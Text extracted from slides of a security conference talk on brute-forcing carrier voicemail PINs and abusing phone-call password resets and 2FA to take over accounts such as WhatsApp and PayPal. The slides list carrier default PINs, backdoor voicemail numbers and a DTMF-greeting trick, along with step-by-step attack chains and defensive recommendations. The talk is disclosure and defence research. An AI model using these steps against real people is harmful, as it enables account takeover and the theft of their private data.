Transcription
Compromising online accounts bycracking voicemail systemsMartin Vigo@martin vigo martinvigo.com
wedrutCapMartin VigoProduct Security LeadFrom Galicia, SpainResearch Scuba Gin tonics@martin vigo - martinvigo.com
Historyback to ezines
“You can just enter all 2-digit combinations until youget the right one” “A more sophisticated and fast way to do this is totake advantage of the fact that such machinestypically do not read two numbers at a time, anddiscard them, but just look for the correct sequence”Hacking Telephone Answering Machines by Doctor Pizz and Cybersperm
“Quickly Enter the following 70809001(this is the shortest string for entering every possible 2-digit combo.)”Hacking AT&T Answering Machines Quick and Dirty by oleBuzzard
“Defaults For ASPEN Are:(E.G. Box is 888) .Use Normal Hacking Techniques:------------------------------i.e.1111 \ /999912344321”A Tutorial of Aspen Voice Mailbox Systems, by Slycath
“There is also the old "change the message" secret tomake it say something to the effect of this lineaccepts all toll charges so you can bill third partycalls to that number”Hacking Answering Machines 1990 by Predat0r
Voicemail security in the ‘80s Default PINs Common PINs Bruteforceable PINs Efficient bruteforcing sending multiple PINs at once The greeting message is an attack vector
Voicemail security todaychecklist time!
Voicemail security todayDefault PINs Common PINs Bruteforceable PINs Efficient bruteforcingby entering multiplePINs at once The greetingmessage is an attackvectorAT&T Last 4 digits of the phone numberSprint 111111T-Mobile Last 4 digits of the phone number 4 last digits of client number 4 last digits of PUK for CallYaTelekom Last 7 digit of the phone numberVerizon Vodafone 4 last digits of card numberO2 8705
Voicemail security today2012 Research study by Data r32012Default PINsCommon PINs Bruteforceable PINs Efficient bruteforcingby entering multiplePINs at once The greetingmessage is an attackvector
Voicemail security todayDefault PINsCommon PINs Bruteforceable PINs Efficient bruteforcingby entering multiplePINs at once The greetingmessage is an attackvectorAT&T 4 to 7 digits4 to 10 digitsVerizon 4 to 6 digitsVodafone 4 to 7 digitsTelekom Sprint 4 to 10 digitsT-Mobile 4 to 10 digitsO2 4 to 10 digits
Voicemail security todayDefault PINsCommon PINsBruteforceable PINsEfficient bruteforcingby entering multiplePINs at once The greetingmessage is an attackvector Supports multiple pins at a time 0000#1111#2222#Without waiting for prompt or error messages
voicemailcracker.pybruteforcing voicemails fast, cheap, easy, efficiently and undetected
voicemailcracker.py Fast Uses Twilio’s APIs to make hundredsof calls at a timeEasy Fully automated Configured with specific payloads formajor carriersCheap Entire 4 digits keyspace for 40A 50% chance of correctly guessing a4 digit PIN for 5Check 1000 phone numbers fordefault PIN for 13 Efficient Optimizes bruteforcing Tries multiple PINs in the same call Uses existing research to prioritize defaultPINs, common PINs, patterns, etc.
Undetected
Straight to voicemail Multiple calls at the same time It’s how slydial service works in realityCall when phone is offline OSINT Use backdoor voicemailnumbers No need to call the victim!Airplane, movie theater, remote trip, DoNot Disturb Query HLR database Online services like realphonevalidation.comAT&T: 408-307-5049Verizon: 301-802-6245Class 0 SMST-Mobile: 805-637-7243 Sprint: 513-225-6245Reports back if it was displayedVodafone: XXX-55-XXXXXXXXTelekom: XXX-13-XXXXXXXXO2: XXX-33-XXXXXXXX
voicemailcracker.py Fast Uses Twilio’s APIs to make hundredsof calls at a timeCheap Easy Fully automated Configured with specific payloads for major carriersEfficient Optimizes bruteforcing Entire 4 digits keyspace for 40 Tries multiple PINs in the same call A 50% chance of correctly guessing a4 digit PIN for 5 Uses existing research to prioritize default PINs,common PINs, patterns, etc. Check 1000 phone numbers fordefault PIN for 13 Undetected Supports backdoor voicemail numbers
Bruteforce protections
Different flavors in GermanyVodafoneTelekomO2Resets to a 6 digit PINand sends it over SMSBlocks the Caller ID fromaccessing mailboxor even leaving messagesConnects directly tocustomer help-line
Caller IDs are cheapVodafoneResets to a 6 digit PINand sends it over SMSTelekomBlocks the Caller ID fromaccessing mailboxor even leaving messagesO2Connects directly tocustomer help-line
voicemailcracker.py Fast Uses Twilio’s APIs to make hundredsof calls at a time CheapEasy Fully automated Configured with specific payloads for major carriersEfficient Optimizes bruteforcing Tries multiple PINs in the same call Uses existing research to prioritize default PINs, common PINs,patterns, etc. Entire 4 digits keyspace for 40 A 50% chance of correctly guessing a4 digit PIN for 5 Check 1000 phone numbers fordefault PIN for 13 Bruteforce protection bypass Undetected Supports backdoor voicemail numbers Supports Caller ID randomization
Demobruteforcing voicemail systems with voicemailcracker.py
Impactso what?
What happens if youdon’t pick up?
Voicemail takes thecall and records it!
Attack vector1. Bruteforce voicemail system, ideally using backdoor numbers2. Ensure calls go straight to voicemail (call flooding, OSINT, etc.)3. Start password reset process using “Call me” feature4. Listen to the recorded message containing the secret code5. Profit!voicemailcracker.py can do all this automatically
Democompromising WhatsApp
We done? Not yet
User interaction based protectionPlease press any key to hear the code Please press [ARANDOMKEY] to hear the code Please enter the code
Can we beat thisrecommended protection?
Hint
Another hintDefault PINsCommon PINsBruteforceable PINsEfficient bruteforcingby entering multiplePINs at onceThe greetingmessage is an attackvector
We can record DTMFtones as the greetingmessage!
Attack vector1. Bruteforce voicemail system, ideally using backdoor numbers2. Update greeting message according to the account to be hacked3. Ensure calls go straight to voicemail (call flooding, OSINT, etc.)4. Start password reset process using “Call me” feature5. Listen to the recorded message containing the secret code6. Profit!voicemailcracker.py can do all this automatically
Democompromising Paypal
Vulnerable servicessmall subset
Password reset
2FA
Verification
Physical security
Consent
Open source
voicemailautomator.py No bruteforcing Limited to 1 carrier Change greeting message with specially crafted payloads Retrieve messages containing the secret temp codesGit repo: github.com/martinvigo/voicemailautomator
Recommendations
Still do I care?if (carriersSetDefaultPins TRUE)if le TRUE)if (updatingGreetingMessageAutomatable TRUE)if (retrievingNewestMessageAutomatable TRUE)if (speechToTextTranscription TRUE)if (accountCompromiseIsAutomatable TRUE)print “Yes, I should care”
Recommendations for online services Don’t use automated calls for security purposes If not possible, detect answering machine and fail Require user interaction before providing the secret with the hope that carriers ban DTMF tones from greeting messages
Recommendations for carriers Ban DTMF tones from greetingmessages Eliminate backdoor voicemailservices or at least no access to loginprompt from themVoicemail disabled by default and can only be activated from theactual phone or online No default PIN Don’t allow common PINs Detect and prevent bruteforce attempts Don’t process multiple PINs at once
Recommendations for you Disable voicemail or use longest possible, random PINDon’t provide phone number to online services unlessrequired or it’s the only way to get 2FA use a virtual number to prevent OSINT and SIM swappingUse 2FA apps only
TL;DRAutomated phone calls are a common solution for password reset, 2FA,verification and other services. These can be compromised by leveraging oldweaknesses and current technology to exploit the weakest link, voicemail systemsStrong password policy2FA enforcedAbuse/Bruteforce preventionA in OWASP Top 10 checklistMilitary grade crypto end to endLots of cyberPassword reset 2FA Verification Consentover phone call
Danke schön!@martin tinvigo
1. Bruteforce voicemail system, ideally using backdoor numbers 2. Update greeting message according to the account to be hacked 3. Ensure calls go straight to voicemail (call flooding, OSINT, etc.) 4. Start password reset process using “Call me” feature 5. Listen to
